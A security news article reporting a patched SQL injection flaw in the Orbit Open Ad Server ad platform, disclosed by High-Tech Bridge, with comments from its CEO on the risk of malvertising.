Popular ad server patches SQL injection flaw impacting platform

Share this article:
Popular ad server patches SQL injection flaw impacting platform
Orbit Open Ad Server was vulnerable to SQL injection attacks.

A popular ad serving and management platform, Orbit Open Ad Server, was impacted by a SQL injection vulnerability, which left website visitors' vulnerable to data theft.

Swiss penetration testing firm High-Tech Bridge notified OrbitScripts, the vendor for the ad platform, last month, and the issue was quickly addressed on March 21, High-Tech Bridge revealed in a security advisory. But, the security concern served as a cautionary tale of how attackers can cleverly use malvertising to go after large numbers of online users.

On Wednesday, Ilia Kolochenko, CEO of High-Tech Bridge, told SCMagazine.com that, despite companies taking all the right steps to secure their websites, malvertising – which targets site visitors via poisoned third-party ads – can best enterprises.

SQL injection attacks could allow a saboteur to inject malicious code into applications, such as databases or other data entry fields, to leave financial or other sensitive information inputted on websites subject to theft.

In the case of Orbit Open Ad Server, the “damage could be really huge,” Kolochenko explained, as the SQL injection flaw could be leveraged to bypass platform users themselves, and go after the bigger bounty – online visitors of thousands of websites utilizing the open source ad server.

The software can be used to manage ads placed on various websites, including those operated via popular blogging platforms, like WordPress, Drupal and Joomla.

“You can make sure that the site is up-to-date, but as soon as you start hosting ads and put their content online, you cannot really control what they serve,” Kolochenko said. “Hackers can easily host spyware or malware, instead of legitimate [advertising] content, on your site.”

On Wednesday, a representative for OrbitScripts confirmed with SCMagazine.com via email that the SQL injection issue had been patched as of March 21.

Last fall, High-Tech Bridge also uncovered serious, but common, website vulnerabilities (XSS flaws) that impacted the security of Yahoo domains and NASDAQ's website.

Share this article:

Sign up to our newsletters

More in News

DDoS attacks remain up, stronger in Q2, report says

DDoS attacks remain up, stronger in Q2, report ...

Prolexic's second quarter DDoS report noted the proliferation of shorter attacks that ate up more bandwidth.

Superman soars above fellow superheroes as most toxic search term

A McAfee study found that searches pertaining to Superman exposed users to the most infected websites.

Black Hat talk on Tor weaknesses canceled

Black Hat organizers say legal counsel for the Software Engineering Institute and Carnegie Mellon University nixed the session.